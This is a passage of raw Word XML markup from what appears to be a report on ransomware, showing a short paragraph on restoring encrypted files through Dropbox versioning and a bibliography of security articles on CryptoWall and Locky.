              <w:noProof/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r w:rsidR="00390CF1">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003019A6" w:rsidP="03F6C9C5" w:rsidRDefault="03F6C9C5" w14:paraId="4D7F46CF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dropbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03F6C9C5" w:rsidP="003019A6" w:rsidRDefault="003019A6" w14:paraId="71ED8C1F" w14:textId="78869F5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dropbox </w:t>
      </w:r>
      <w:r w:rsidR="00B66DE9">
        <w:t xml:space="preserve">is a cloud drive space service offered online. A folder copy of </w:t>
      </w:r>
      <w:r w:rsidR="009F4DE5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D93C32">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="009F4DE5">
        <w:t>ropbox contents exists on System Users computers</w:t>
      </w:r>
      <w:r w:rsidR="008004F2">
        <w:t xml:space="preserve">, which is synced to the cloud copy and </w:t>
      </w:r>
      <w:r w:rsidR="008004F2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">any changes onwards. The paid service offers a versioning </w:t>
      </w:r>
      <w:r w:rsidR="002B704E">
        <w:t xml:space="preserve">process by which you can restore your </w:t>
      </w:r>
      <w:r w:rsidR="00B7657D">
        <w:t xml:space="preserve">encrypted </w:t>
      </w:r>
      <w:r w:rsidR="002B704E">
        <w:t xml:space="preserve">files </w:t>
      </w:r>
      <w:r w:rsidR="00553A8C">
        <w:t>to their original state.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2071466740"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:instrText xml:space="preserve"> CITATION cry16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="7A011108" w:rsidP="00DC3158" w:rsidRDefault="7A011108" w14:paraId="371C7260" w14:textId="31666FCF"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1982765980"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00C32E24" w:rsidP="00C008B5" w:rsidRDefault="00C008B5" w14:paraId="24B9C700" w14:textId="06C809A0">
          <w:pPr>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t>Bibliography</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w:rsidR="009E426E" w:rsidP="00C008B5" w:rsidRDefault="00C008B5" w14:paraId="4C4FA867" w14:textId="7777777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9E426E" w14:paraId="05855281" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="6A09EA86" w14:textId="6D46B30B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="1977019B" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Cryptowall-Ransomware-Information,” 2018. [Online]. Available: https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#CryptoWall.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="7793FE68" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="66BAE55E" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="2AFE446E" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B. Booker, “CryptoWall: Hackers using bitcoin to demand ransoms,” CryptoWall: Hackers using bitcoin to demand ransoms , [Online]. Available: https://99bitcoins.com/cryptowall-hackers-using-bitcoin-to-demand-ransoms/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="0E66B587" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="0393E2CE" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="5B70B899" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. Puodzius, “How-Encryption-Molded-Crypto-Ransomware/,” welivesecurity.com, 13 12 2016. [Online]. Available: https://www.welivesecurity.com/2016/09/13/how-encryption-molded-crypto-ransomware/. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="0DAF2487" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="154EBDC2" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="08D27A6C" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Ransomware,” Wikipedia, 2018. [Online]. Available: https://en.wikipedia.org/wiki/Ransomware. [Accessed 19 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="2D65C75C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="131917BA" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="44AFF564" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>T. B. Team, “ransomware-statistics-2018,” August 2018. [Online]. Available: https://blog.barkly.com/ransomware-statistics-2018. [Accessed 20 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="6DCEECA7" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="349DD995" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="26B0F5B5" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Ransomware-Statistics-2016,” blog.barkly.com, 2016. [Online]. Available: https://blog.barkly.com/ransomware-statistics-2016. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="74D49ADA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="3659C2F2" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="2C98968E" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“look-into-locky,” Malwarebytes, [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="748C443A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="1B459229" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="5704F733" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“onion-ransomware-virus-threat,” Kaspersky, [Online]. Available: https://usa.kaspersky.com/resource-center/threats/onion-ransomware-virus-threat. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="387217B5" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="44226A11" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="774BF7E6" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“ransomware-statistics-2018,” blog.barkly.com, 2018. [Online]. Available: https://blog.barkly.com/ransomware-statistics-2018. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="4BE583F9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="0C045CFD" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="1E700E69" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Codesynced, “pastebin.com/AxKy1tyK,” 2016. [Online]. Available: https://pastebin.com/AxKy1tyK. [Accessed 20 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="6F8B2B3E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="3F04B947" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="3344C01F" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“locky-ransomware/,” checkpoint.com, [Online]. Available: https://blog.checkpoint.com/2016/03/02/locky-ransomware/. [Accessed 19 11 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="1DA3A13F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="4906DC63" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="2741AD57" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“cryptowall-ransomware-information,” [Online]. Available: https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="52594039" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="296DC208" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="72B98611" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“bitcoin.org/en/,” 2018. [Online]. Available: https://bitcoin.org/en/. [Accessed 20 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="41010134" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="4501A2E6" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="6AD32360" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“cryptowall-ransomware-information#ransom,” Bleeping Computer, 2018. [Online]. Available: https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#ransom. [Accessed 20 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="0D5CC491" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="5E97EDF2" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="059056C0" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“cryptowall-ransomware-information#cryptoprevent,” 2018. [Online]. Available: https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#cryptoprevent. [Accessed 11 November 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="009E426E" w14:paraId="0FFFE3D4" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="412318281"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="3AEDA6B9" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="4A21DBF3" w14:textId="77777777">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“cryptowall-ransomware-information#restore,” bleepingcomputer, 2016. [Online]. Available: https://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#restore. [Accessed 21 Novomber 2018].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w:rsidR="009E426E" w:rsidRDefault="009E426E" w14:paraId="66D3FABB" w14:textId="77777777">
              <w:pPr>
                <w:divId w:val="412318281"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w:rsidR="00C008B5" w:rsidP="00C008B5" w:rsidRDefault="00C008B5" w14:paraId="2378898B" w14:textId="0E21D8E8">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C008B5" w:rsidP="00C008B5" w:rsidRDefault="00C008B5" w14:paraId="2A891D16" w14:textId="77777777"/>
    <w:sectPr w:rsidR="00C008B5">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Roboto">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E10002FF" w:usb1="4000FCFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Helvetica">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2832AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34480D26"/>
    <w:lvl w:ilvl="0" w:tplc="B9906E8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="603C63C2">
      <w:start w:val="1"/>
